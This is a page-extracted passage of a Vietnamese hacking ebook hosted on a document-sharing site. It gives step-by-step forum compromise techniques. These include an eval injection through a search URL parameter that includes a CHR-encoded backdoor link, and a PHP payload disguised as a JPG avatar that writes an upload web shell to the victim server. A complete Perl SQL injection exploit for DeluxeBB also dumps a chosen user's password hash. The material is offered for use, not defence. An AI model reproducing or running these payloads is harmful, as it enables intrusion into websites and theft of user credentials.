1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 431 pdf

6 61 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 158,51 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Nên khi làm như cách trên mình ứh mần ăn được gì cả nên nghĩ ra cách khác chơi hihi!. Làm theo lời bác : IceShaman Lợi dụng chỗ up avatar nếu forum nào ko kĩ sẽ cho mem có quyền upload

Trang 1

(122).CHR(47).CHR(117).CHR(112).CHR(108).CHR(111)

CHR(97).CHR(100).CHR(115).CHR(47).CHR(97).CHR(118)

.CHR(45).CHR(56).CHR(53).CHR(46).CHR(106).CHR(112) CHR(103))); //

Lưu ý : Các ASCII trên là link con backdoor của mình , chỗ này convert hơi mệt nhĩ

POst song vào "SEARCH" rồi search với từ khóa : " langtuelval " nhưng nhớ phần

"Search Options" chỗ "Result Type" chọn "Show results as posts" !

Search 1 phát nó open luôn topic mới nãy mình mới post , rồi nhìn lên address có dạng :

thptbmt.biz/index.php?act=Search&CODE=show&searchid=377eb74395

7288d34ec63034d6b558a2&search_in=posts&result_type

=posts&highlite=langtueval

thêm vào đằng sau link : &lastdate=z|eval.*?%20//)%23e%00

thành : thptbmt.biz/index.php?act=Search&CODE=show&searchid=377eb74395 7288d34ec63034d6b558a2&search_in=posts&result_type

=posts&highlite=langtueval&lastdate=z|eval.*?%20//)%23e%00

Khi run link này nó sẽ include tới link backdoor mà ta đã chuyển về dạng ASCII ở trên !

Thía là song

Nhưng mình lại ko rành mí remv này ! híc ! Nên khi làm như cách trên mình ứh mần ăn được gì cả nên nghĩ ra cách khác chơi hihi !

Làm theo lời bác : IceShaman

Lợi dụng chỗ up avatar ( nếu forum nào ko kĩ sẽ cho mem có quyền upload avatar

Trang 2

lên ) !

UP 1 avatar mang tên langtu.JPG với nội dung thía lày :

CODE

<?

$file=fopen("./uploads/upload.php",w);

$content="<form enctype='multipart/form-data' action='upload.php'

method='POST'>"

."<input type='hidden' name='MAX_FILE_SIZE' value='10000000' />Choose a file to upload: <input name='uploadedfile' type='file' />"

."<br /><input type='submit' value='Upload File' /></form>"

."<?if (!isset("."$"."HTTP_POST_VARS['MAX_FILE_SIZE'])) { die();}"

."$"."target_path = './'; "."$"."target_path = "."$"."target_path basename(

"."$"."_FILES['uploadedfile']['name']); "

."if(move_uploaded_file("."$"."_FILES['uploadedfile']['tmp_name'],

"."$"."target_path)) { echo 'OK '; } "

."else{ echo 'There was an error uploading the file, please try again!'; }?>";

if (fwrite($file, $content) === FALSE) {

echo "Cannot write to file ";

exit;

}

echo "Success";

Trang 3

fclose($file);

?>

Như đoạn code trên nó sẽ ghi ra 1 file upload.php với chức năng UPLOAD mà phải hem hihi !

Sau đó edit lại cái link ASCII thành cái link avatar mà mình mới up lên ( thường thì có dạng link.com/forum/uploads/av-xx.jpg )

tiếp : http://www.victim.com/forum/uploads/upload.php

Up 1 con remv mới lên Sữ dụng OK

Cách của lt chỉ mang tính chắc ăn thôi Vì mình làm cách trên kia ko được nên mới dài dòng như thía này !

Nếu dùng cách trên như tut video thì hy có thể thữ nó tại đây :

để dịch link qua dạng ascii bạn vào : www.haylam.com/lhav/decoder.php

nhét link remv dạng jpg mà bạn mới up vào và nhất String -> ASCII

langtuhaohoa(HCE)

Some Remote SQL Injection Exploit

Trích:

#!/usr/bin/perl

use IO::Socket;

Trang 4

print q{

################################################## ####

# DeluxeBB Remote SQL Injection Exploit #

# vbulletin Remote SQL Injection Exploit #

################################################## ####

};

if (!$ARGV[2]) {

print q{

Usage: perl dbbxpl.pl host /directory/ victim_userid

perl dbbxpl.pl www.somesite.com /forum/ 1

};

}

$server = $ARGV[0];

$dir = $ARGV[1];

$user = $ARGV[2];

$myuser = $ARGV[3];

$mypass = $ARGV[4];

$myid = $ARGV[5];

print " -\r\n";

print "[>] SERVER: $server\r\n";

print "[>] DIR: $dir\r\n";

print "[>] USERID: $user\r\n";

print

Trang 5

" -\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path = $dir;

$path = "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass

,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0

,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;

print "[~] PREPARE TO CONNECT \r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",

PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";

print "[~] SENDING QUERY \r\n";

print $socket "GET $path HTTP/1.1\r\n";

print $socket "Host: $server\r\n";

print $socket "Accept: */*\r\n";

print $socket "Connection: close\r\n\r\n";

print "[+] DONE!\r\n\r\n";

print " [ REPORT ] -\r\n";

while ($answer = <$socket>)

{

if ($answer =~/(\w{32})/)

{

if ($1 ne 0) {

Trang 6

print "Password Hash is: ".$1."\r\n";

print " -\r\n";

}

exit();

}

}

print " -\r\n";

Ngày đăng: 04/07/2014, 12:20